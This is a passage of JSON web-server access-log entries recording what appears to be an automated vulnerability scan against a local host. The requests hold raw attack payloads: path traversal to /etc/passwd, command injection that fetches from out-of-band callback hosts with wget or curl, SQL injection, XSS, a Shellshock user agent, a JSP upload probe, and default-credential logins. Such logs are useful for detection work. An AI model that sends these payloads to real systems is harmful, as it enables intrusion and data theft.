HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /package-lock.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2Fca28q98smpvbk9ig07h0dxaa4rxtkig1o.oast.online%60 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"username=admin&password=geoserver","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /geoserver/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/users/search_authors HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"------WebKitFormBoundaryFy3iNVBftjP6IOwo\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22poc.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%out.print(2be8e556fee1a876f10fa086979b8c7c);%>\x0D\x0A------WebKitFormBoundaryFy3iNVBftjP6IOwo--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /page/exportImport/uploadOperation.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2Fca28q98smpvbk9ig07h03ymg6m5xebudx.oast.online%60 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?phpinfo=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CACHE/sdesktop/install/start.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /page/exportImport/fileTransfer/poc.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"\x0D\x0A \x0D\x0A HTTP://127.0.0.1/wsman/\x0D\x0A http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\x0D\x0A \x0D\x0A http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous\x0D\x0A \x0D\x0A http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript\x0D\x0A 102400\x0D\x0A uuid:00B60932-CC01-0005-0000-000000010000\x0D\x0A PT1M30S\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A root/scx\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A aWQ=\x0D\x0A \x0D\x0A 0\x0D\x0A true\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wsman HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /os/mxperson HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"{\x22metadata\x22:{\x22order_id\x22:\x221 and updatexml(1,concat(0x7e,(SELECT md5(202072102)),0x7e),1)\x22},\x22status\x22:2}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"command=2&ipAddr=&dnsAddr=$(wget+http://ca28q98smpvbk9ig07h08if7iou8zzbdr.oast.online)&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi/networkDiag.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"document=this.constructor.constructor(\x22return process\x22)().mainModule.require(\x22child_process\x22).execSync(\x22curl http://ca28q98smpvbk9ig07h0ja4mhdonq13ss.oast.online\x22)","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /checkValid HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wt2parser.cgi?home_en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /meaweb/os/mxperson HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"--871a4a346a547cf05cb83f57b9ebcb83\x0D\x0AContent-Disposition: form-data; name=\x22files\x22; filename=\x22test.tar\x22\x0D\x0A\x0D\x0A../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 0000000000000029KFpVTh0Waw8qeQDGCaffGu2bB\x0D\x0A--871a4a346a547cf05cb83f57b9ebcb83--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servlet/UploadServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi2/status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/System/MailConnect/host/ca28q98smpvbk9ig07h0b35amf5wjatgo.oast.online/port/80/secure/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hp/device/DeviceInformation/View HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adjuncts/3a890183/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/authportal/bounce.php?url=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.163","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///apps HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.173","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /script/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.162","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.164","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webconsole/webpages/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.161","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.141","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/jarrewrite.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.139","http_user_agent":"\x22() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'\x22", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.136","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%23.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.130","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.128","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com/%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.146","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"{\x22id\x22:\x22insecure-firebase-database\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /29KFpdBo2vASjmAsn1OKT6ZosV2.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.151","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KFpdBo2vASjmAsn1OKT6ZosV2.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.120","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", 